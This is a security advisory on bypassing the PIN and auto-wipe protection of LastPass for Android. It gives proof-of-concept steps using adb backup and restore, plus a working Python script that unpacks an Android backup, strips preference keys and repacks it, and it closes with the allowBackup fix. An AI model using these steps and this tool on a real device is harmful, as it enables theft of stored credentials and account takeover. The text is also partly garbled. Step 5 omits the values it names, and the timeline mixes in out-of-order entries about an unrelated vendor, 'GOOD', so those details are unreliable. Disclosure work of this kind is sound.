LastPass Android Container PIN / Auto-Wipe Bypass

Posted Nov 13, 2013
Authored by Chris John Riley

LastPass suffers from container PIN and auto-wipe security feature bypass vulnerabilities.

tags | advisory, vulnerability, bypass
advisories | CVE-2013-5113, CVE-2013-5114
MD5 | f052c12e26ca0c1cbe9bc92f377cc123

LastPass Android container PIN and auto-wipe security feature bypass

Product: LastPass (Android)
Project Homepage: lastpass.com
Internal Advisory ID: c22-2013-02
Vulnerable Version(s): LastPass for Android 2.0.4 (and prior)
Tested Version: LastPass for Android 2.0.4 (on Android 4.2/4.3)
Vendor Notification: Aug 13, 2013
Public Disclosure: November XX, 2013
Vulnerability Type: Authentication Bypass Issues [CWE-592]
CVE Reference: CVE-2013-5113, CVE-2013-5114
Issue Severity: Important impact
CVSSv2 Base Score: 6.6 (AV:L/AC:L/AU:N/C:C/I:C/A:N)
Discovery: Chris John Riley ( http://blog.c22.cc )

Advisory Details:

Affected versions of LastPass on the Android platform allow a user with
limited access via the ADB (Android Debug Bridge) interface of an Android
device (USB debugging enabled, no root access required) to perform a
backup and restore of the application and its data. The ADB backup
functionality requires a device running Android 4.0 (Ice Cream Sandwich)
or later.

LastPass on Android allows the user to store the lastpass.com username
and password within the Android container and to set a PIN to prevent
unauthorized access in the event the device is lost or stolen. Enabling
PIN protection also enables an auto-wipe feature that deletes the
application data after 10 failed PIN entries.

Due to the way recent versions of Android implement the backup and
restore process, both the PIN protection and the enforced auto-wipe can
be bypassed entirely: an attacker can clear or recover the PIN from the
application settings data stored in LPandroid.xml.

Using a simple process, an attacker with physical access to a device can
back up the LastPass Android container and remove any PIN protection
present on the application. It is also possible to restore the LastPass
Android container to a secondary device and maintain live access to
changes made by the user, either via the lastpass.com web interface or
via the original device's LastPass Android application. This exposes not
only the cached username and password data stored within the LastPass
Android container at the time it was acquired, but also any changes made
after the fact.

Attackers can extract, and possibly maintain access to, a user's LastPass
data from a lost or stolen device. This effectively allows an attacker to
use the credentials recovered from LastPass to take over the user's
LastPass account.

Proof of Concept:

1) Gain physical access to an Android device containing the LastPass
application
2) Enable USB debugging (if not already enabled)
3) Perform a backup of the LastPass application using ADB
(adb backup com.lastpass.lpandroid, which writes backup.ab to the
current directory)
4) Extract the resulting Android backup file (using for example the
ab_unpacker.py tool available here -->
https://github.com/ChrisJohnRiley/Random_Code/tree/master/android backup
5) Edit the extracted LPandroid.xml file to remove the following values
6) Repack the directory structure (using for example the
ab_upacker.py tool available here -->
https://github.com/ChrisJohnRiley/Random_Code/tree/master/android backup
7) Restore to either the original device or a secondary attacker
controlled Android device using ADB (adb restore edited_backup.ab)
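Steps 4 to 6 above (unpack the .ab file, edit the SharedPreferences XML, repack it) carried through offline in Python, as an added example for this advisory. It is not the author's ab_unpacker.py and not LastPass code. The package name com.example.app, the preference path apps/<pkg>/sp/prefs.xml and the key names example_pin, example_failed_attempts and example_username are placeholders constructed for the example, since this copy of the advisory does not list the real LPandroid.xml keys. It handles the unencrypted archives that a plain adb backup produces; a backup taken with a backup password is encrypted and is rejected.

```python
#!/usr/bin/env python3
"""Unpack, edit and repack an unencrypted 'adb backup' archive (.ab) offline.

Added example for this advisory, not the author's ab_unpacker.py and not
LastPass code. The package name, preference path and key names below are
placeholders constructed for the example, not the real LPandroid.xml keys.
"""
import io
import sys
import tarfile
import zlib
import xml.etree.ElementTree as ET

AB_MAGIC = b"ANDROID BACKUP"
# Declaration Android writes at the top of a SharedPreferences file.
XML_DECL = "<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n"


def ab_unpack(ab_bytes):
    """Parse the four text header lines of an .ab file; return (version, compressed, tar_bytes)."""
    parts = ab_bytes.split(b"\n", 4)
    if len(parts) != 5 or parts[0] != AB_MAGIC:
        raise ValueError("not an Android backup file")
    version, compressed, encryption, body = int(parts[1]), parts[2] == b"1", parts[3], parts[4]
    if encryption != b"none":
        # A backup taken with a backup password is AES-encrypted; editing it
        # needs that password, which this example does not handle.
        raise ValueError("encrypted backup (%s) not handled" % encryption.decode())
    return version, compressed, (zlib.decompress(body) if compressed else body)


def ab_pack(version, compressed, tar_bytes):
    """Inverse of ab_unpack: wrap tar_bytes in an unencrypted .ab header."""
    header = b"%s\n%d\n%d\nnone\n" % (AB_MAGIC, version, 1 if compressed else 0)
    return header + (zlib.compress(tar_bytes) if compressed else tar_bytes)


def strip_prefs(xml_bytes, drop_keys):
    """Delete <map> children whose name= attribute is in drop_keys; return (new_xml, removed)."""
    root = ET.fromstring(xml_bytes)
    doomed = [c for c in root if c.get("name") in drop_keys]
    for child in doomed:
        root.remove(child)
    new_xml = (XML_DECL + ET.tostring(root, encoding="unicode")).encode("utf-8")
    return new_xml, [c.get("name") for c in doomed]


def edit_backup(ab_bytes, prefs_path, drop_keys):
    """Rewrite one SharedPreferences entry inside the backup; return (new_ab, removed)."""
    version, compressed, tar_bytes = ab_unpack(ab_bytes)
    out, removed = io.BytesIO(), None
    # Android's restore code is a simple tar reader that handles a package's
    # _manifest before its data, so keep plain ustar headers and the original order.
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as src, \
         tarfile.open(fileobj=out, mode="w:", format=tarfile.USTAR_FORMAT) as dst:
        for member in src:
            data = src.extractfile(member).read() if member.isfile() else None
            if member.name == prefs_path:
                data, removed = strip_prefs(data, drop_keys)
                member.size = len(data)
            dst.addfile(member, io.BytesIO(data) if data is not None else None)
    if removed is None:
        raise KeyError("%s not present in backup" % prefs_path)
    return ab_pack(version, compressed, out.getvalue()), removed


def read_entry(ab_bytes, path):
    """Return the content of one tar entry in an .ab file (for checking results)."""
    with tarfile.open(fileobj=io.BytesIO(ab_unpack(ab_bytes)[2]), mode="r:") as tf:
        return tf.extractfile(path).read()


def entry_names(ab_bytes):
    """Return the tar entry names in an .ab file, in archive order."""
    with tarfile.open(fileobj=io.BytesIO(ab_unpack(ab_bytes)[2]), mode="r:") as tf:
        return tf.getnames()


def build_sample_backup(pkg="com.example.app"):
    """Constructed input: a tiny compressed, unencrypted .ab with a placeholder
    _manifest and one SharedPreferences file. Not real LastPass data."""
    prefs = (XML_DECL + "<map>\n"
             "    <string name=\"example_pin\">1234</string>\n"
             "    <int name=\"example_failed_attempts\" value=\"7\" />\n"
             "    <string name=\"example_username\">alice@example.org</string>\n"
             "</map>\n").encode("utf-8")
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:", format=tarfile.USTAR_FORMAT) as tf:
        for name, payload in (("apps/%s/_manifest" % pkg, b"1\n" + pkg.encode() + b"\n"),
                              ("apps/%s/sp/prefs.xml" % pkg, prefs)):
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tf.addfile(info, io.BytesIO(payload))
    return ab_pack(1, True, buf.getvalue())


if __name__ == "__main__":
    # ab_edit.py backup.ab edited_backup.ab apps/<pkg>/sp/<file>.xml key [key ...]
    if len(sys.argv) < 5:
        sys.exit("usage: %s in.ab out.ab prefs-path key [key ...]" % sys.argv[0])
    with open(sys.argv[1], "rb") as f:
        new_ab, gone = edit_backup(f.read(), sys.argv[3], set(sys.argv[4:]))
    with open(sys.argv[2], "wb") as f:
        f.write(new_ab)
    print("removed keys:", gone)
```

Against a real archive the invocation is `python3 ab_edit.py backup.ab edited_backup.ab apps/com.lastpass.lpandroid/sp/LPandroid.xml <key ...>`, followed by step 7 (`adb restore edited_backup.ab`). The .ab container is just four text lines (magic, format version, compressed flag, encryption method) in front of a zlib stream holding a tar archive, which is why a backup taken without a backup password can be rewritten with nothing more than the standard library. The tar is written back in plain ustar format with entries in their original order because the restore side of Android is a minimal tar reader that processes a package's _manifest entry before its data files.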

LastPass has released a new version to the Google Play store that
corrects these issues by disabling the ability to perform an ADB backup
of the LastPass container (android:allowBackup="false" in the
application manifest, as recorded in the timeline below). Version 2.5.1
has been confirmed to be no longer directly susceptible to this attack
method.

At this time LastPass has not provided an advisory discussing the issue.
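The fix the timeline records is the manifest attribute android:allowBackup="false". The fragment below is an added illustration of the weak setting beside the corrected one; it is not LastPass's actual manifest, and the android:label value is a placeholder:

```xml
<!-- Weak: backup via adb permitted. Omitting the attribute has the same
     effect, because allowBackup defaults to true. -->
<application
    android:label="@string/app_name"
    android:allowBackup="true">
</application>

<!-- Corrected: the backup framework skips this application's data, so
     "adb backup <package>" no longer yields the container. -->
<application
    android:label="@string/app_name"
    android:allowBackup="false">
</application>
```

To check a shipped APK rather than its source, run `aapt dump xmltree app.apk AndroidManifest.xml` and look for the `android:allowBackup` attribute on the `application` element: a value of `0x0` is false, and an absent attribute means the default, true. Two caveats apply. The attribute only governs the backup framework; on a rooted device the application's private data directory can be read directly, so it is not a substitute for encrypting the stored secrets. And, as the timeline notes, the author reported a further bypass after the fix that LastPass accepted as low risk; its details are not part of this advisory.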

Vulnerability Timeline:

May, 2013 - Initial discovery of vulnerability
Aug 13, 2013 - LastPass contacted with request for secure communications
Aug 13, 2013 - Response from LastPass setting up secure communications
Aug 13, 2013 - Details reported to LastPass
Aug 13, 2013 - Clarification of issue
Aug 13, 2013 - Response from LastPass that allowBackup:false is now set
in all new releases (change already implemented in testing prior to
the report being received)
Aug 16, 2013 - CVE numbers sent to LastPass
Aug 28, 2013 - Name added to LastPass acknowledgements page
June 30, 2013 - Initial Answer from GOOD
Aug 8, 2013 - Telephone conference with GOOD (cancelled)
Sept 05, 2013 - Response that issues resolved to LastPass's satisfaction
Sept 05, 2013 - Re-Tested and advised of new bypass
Sept 05, 2013 - Blog post released demonstrating process
Sept 06, 2013 - Acceptance of risk associated with new Bypass (low risk)
Nov 13, 2013 - Advisory released (delayed)

